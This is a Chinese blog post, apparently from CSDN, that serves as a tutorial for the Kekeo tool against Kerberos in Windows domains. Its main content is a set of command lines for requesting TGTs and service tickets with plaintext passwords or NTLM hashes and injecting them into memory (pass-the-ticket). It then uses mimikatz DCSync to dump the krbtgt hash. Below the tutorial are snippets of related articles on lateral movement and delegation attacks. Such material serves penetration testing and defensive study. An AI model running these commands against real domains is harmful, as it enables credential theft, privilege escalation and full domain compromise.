Kekeo使用

最新推荐文章于 2024-03-26 09:39:50 发布
最新推荐文章于 2024-03-26 09:39:50 发布
阅读量927 收藏 3
点赞数
分类专栏: 域安全 文章标签: 安全 信息安全 网络安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129192796
版权
Kekeo简介
Kekeo是mimikatz作者Benjamin使用C语言编写的安全工具,
主要是针对Kerberos协议进行攻击的工具,可以发起Kerberos请求,
并将请求票据导入内存中,从而模拟Kerberos协议的各个阶段。
Kekeo重点模块介绍
base64:用于input/output对于base64的支持。
tgt:TGT模块
tgs:TGS模块
exploit:攻击模块
misc:杂项模块
kerberos:Kerberos包模块
smb:小型SMB协议
ntlm:NTLM模块
tssp:TSSSP模块
申请TGT
Kekeo的tgt模块可以申请TGT,可以使用明文或者密码哈希进行认证,
可以将票据导出为文件,也可以将票据注入到当前内存中,将TGT导入内存后,
想请求什么服务,系统就回自动利用该TGT请求指定服务的ST。
例子:
dir请求的CIFS服务
DCSYnc请求的是LDAP服务
1.明文密码请求
	自动导入票据
	(1)Kekeo明文密码自动导入票据
		tgt::ask /user:administrator /domain:test.com /password:P@123456 /ptt

在这里插入图片描述

(2)Kekeo明文导出票据
tgt::ask /user:administrator /domain:test.com /password:P@123456

在这里插入图片描述

	mimiktaz导入票据:
		mimikatz.exe "kerberos:ptt TGT.kirbi" "exit"
2.密码hash请求
	密码哈希申请TGT并导入内存中:
	tgt:ask /user:administrator /domain:test.com /ntlm:xxxxx /ptt

在这里插入图片描述

	密码哈希生成TGT保存到kirbi文件:
	tgt::ask /user:administrator /domain:test.com /ntlm:XXXXX

在这里插入图片描述

申请ST
tgs模块用于申请ST,因此需要提供一张TGT,需要先使用Kekeo请求一张TGT,
然后在使用tgs模块使用该TGT请求指定服务的ST,可以将ST导入到内存中,
也可以将ST保存为凭据文件。
一.申请ST并直接注入到内存中步骤
1.使用明文密码或者hash申请TGT
	tgt::ask /user:administrator /domain:test.com /ntlm:XXXXX	
2.用上一步骤的TGT申请ST,这里请求CIFS票据可以用于dir操作,
如果需要进行Dcsync操作吸引申请LDAP服务。
	tgs::ask /tgt:TGT票据 /service:cifs/AD.test.com /ptt		//cifs服务
	tgs::ask /tgt:TGT票据 /service:ldap/AD.test.com /ptt		//ldap服务可以用于Dcsync
	mimikatz.exe "lsadump::dcsync /domain:test.com /user:krbtgt /csv "exit" 
	上述mimikatz进行Dcsync导出krbtgt hash需要注入到内存ldap服务TGS,

在这里插入图片描述

二.申请ST并保存为凭据
	gs::ask /tgt:TGT票据 /service:cifs/AD.test.com		//cifs服务
	tgs::ask /tgt:TGT票据 /service:ldap/AD.test.com 	//ldap服务可以用于Dcsync

在这里插入图片描述

虚构之人
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网环境下的横向移动——利用kekeo ptt
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-25 394
这里使用到不用管理员权限进行ptt,使用kekeo1.生成票据2.导入票据3.查看票据并访问域控。
【内网学习笔记】27、Kerberos 域用户提权漏洞
TeamsSix 的 CSDN 空间
09-24 1809
0、前言 在 2014 年微软修复了 Kerberos 域用户提权漏洞,即 MS14-068,CVE 编号为 CVE-2014-6324,该漏洞影响了 Windows Server 2012 R2 以下的服务器,该漏洞允许 RT 将任意用户权限提升至域管级别。 不过从漏洞年代就知道这已经是个远古时代的漏洞,现实中已经很少会碰到了,这里就简单记录下,顺便熟悉熟悉工具的用法。 14-068 产生的原因主要在于用户可以利用伪造的票据向认证服务器发起请求,如果用户伪造域管的票据,服务端就会把拥有域管权限的服务票据返
kekeo:在 C 中使用 Microsoft Kerberos 的小工具箱
08-04
可可 kekeo是一个小工具箱,我已经开始在 C 中操作 Microsoft Kerberos(为了好玩) ASN.1 库 在kekeo ,我使用了一个外部商业库来处理Kerberos ASN.1结构: OSS ASN.1/C ( ) 它是我发现可以轻松与 Microsoft C 项目一起使用的唯一代码生成器/库。 无需大量依赖即可工作; 神奇的文档; 对我愚蠢的问题的大力支持; 有一个二进制文件,在开始我的项目后几个小时就可以工作...... 他们很友好地为我提供了 1 年的许可证。 有了这个,我就可以让您下载在您的环境中运行的二进制文件。 所以不要忘记感谢他们( / ) 限制 二进制文件将工作到 2017 年 12 月 21 日(是的,1 年许可证;)); 你必须购买从OSS ASN.1 / C的许可证(或下载试用版)来构建kekeo解决方案/适应它。 当您注册免费
探索Kekeo:一款强大的安全研究与密码恢复工具
最新发布
gitblog_00014的博客
03-26 310
探索Kekeo:一款强大的安全研究与密码恢复工具 项目地址:https://gitcode.com/gentilkiwi/kekeo Kekeo 是一个由 Gentil Kiwi 开发的开源项目,专为安全研究人员和系统管理员设计,用于执行磁盘和内存中的密钥检索操作。该项目利用了Windows系统的内部机制,帮助用户进行密码恢复、加密数据解密等任务,尤其在需要对Windows环境进行安全审计时显得尤...
内网安全:PTH PTK PTT
qq_61553520的博客
01-28 1555
​​​​​​​。
p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递
weixin_43263566的博客
04-25 1471
p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递
域控-笔记三(非约束委派攻击,约束委派攻击)
5L2g556F5ZWl77yf
11-25 2817
文章目录一. 域委派1.1 域委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 非约束委派攻击本地环境非约束委派的查找 一. 域委派 1.1 域委派分类 非约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了非约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
信息安全_数据安全_You (dis)liked mimikatz Wait for.pdf
08-23
例如,加强认证机制,使用多因素认证,防止Pass-the-hash或Pass-the-ticket攻击;定期更新和打补丁,确保系统软件的安全性;以及采用监控和日志记录,及时发现并响应异常活动。 总结来说,信息安全与数据安全是一个...
AD域内委派后门详解-1
06-19
通过setspn命令设置SPN,利用kekeo工具构造和注入票据,攻击者可以模拟服务账号访问目标共享资源。 使用ADFind或PowerView同样可以查询约束委派的机器和服务账户,以便了解哪些账户被授权进行约束委派。 3. **...
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
此外,MS14-068漏洞利用(如案例3所示)通常结合Kekeo工具和本地执行的命令来完成PTT攻击,通过清理凭证、伪造新的Kerberos票证,进而获得高权限。 总的来说,理解这些攻击方式对于防御者来说至关重要,他们需要...
网安学习-内网渗透4
weixin_44770698的博客
08-01 945
网安学习-内网渗透4(仅仅记录整个内网渗透的思路和流程)
内网渗透-横向渗透2
huangyongkang666的博客
04-04 2909
内网渗透-横向渗透2 1.域横向 PTH&PTK&PTT 哈希票据传递 1.域横向移动 PTH 传递 PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 1.PTH攻击介绍 ​ PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Ha
史上最强内网渗透知识点总结
热门推荐
3569
06-02 3万+
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247487491&idx=1&sn=270336c6cca79b4a4e5d777d41ce71b7&chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...
域渗透——Pass The Ticket
citelao的博客
03-21 4575
域渗透——Pass The Ticket 三好学生 · 2016/01/22 10:47 0x00 前言 上篇介绍了有关Pass The Hash 和Pass The Key的技巧,这次接着介绍一下Pass The Ticket 此图片引用自http://dfir-blog.com/2015/12/13/protecting-windows-networks-kerbero
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1434
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
渗透测试横向移动
遇事不决冲冲冲
12-30 3389
介绍 其实也很好理解,在渗透测试时当我们获取到内网某台机器的控制权后,把它当作一个跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大控制范围。甚至最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境。 思路 一.Windows远程连接和相关命令 IPC 介绍 IPC(Internet Process Connection)是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的、用于数据交换的通道。在同一个时间里两个IP只能建立一个IPC连
1.我所了解的内网渗透
weixin_30496431的博客
01-29 2041
最近看了一点内网渗透的学习资料,感觉内网渗透需要的知识太多,遂写博客来记录下自己学习内网渗透的一些笔记。 开篇首先推荐i春秋陈小兵老师在技术沙龙上的分享:https://www.ichunqiu.com/open/61711 并看大佬的一篇msf内网穿透文章:https://www.freebuf.com/articles/network/125278.html 其中内网渗透常见的几个问...
内网渗透-最实用的横向移动总结
告白的博客
10-04 5785
0x00 内网横向移动简介 上期介绍了内网的信息收集,接下来一度时间实现内网的横向移动,内网的渗透过程一一介绍,通过内网主机掌控整个域环境。 0x01 内网横向移动的两种方式 内网的横向移动的方式有传递和漏洞两种: 所谓传递就是通过内置的一系列协议与命令,例如:at,schtasks,psexec,smbexec,wmic,PTH,PTT,PTK等,实现达到渗透其他内网主机,所谓的内网渗透其实就是一个内网的信息收集,掌握了域内的账户密码信息,主机信息,也就掌握了整个域,我们就是要通过横向移动的方式去获取到
高级域渗透技术之再谈Kerberoast攻击
systemino的博客
05-05 1348
Rebeus是一个用C#编写Kerberos 滥用工具包,最初是由@gentilkiwi编写的Kekeo工具包中的一个端口,这个工具包从那时起就在不断发展。要了解更多关于 Rubeus 的信息,请查看"从 Kekeo 到 Rubeus"这篇文章后续的"Rubeus ——Now With More keo"或最近修订的Rubeus README.md。 我最近对 Rubeus 做了一些改进...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值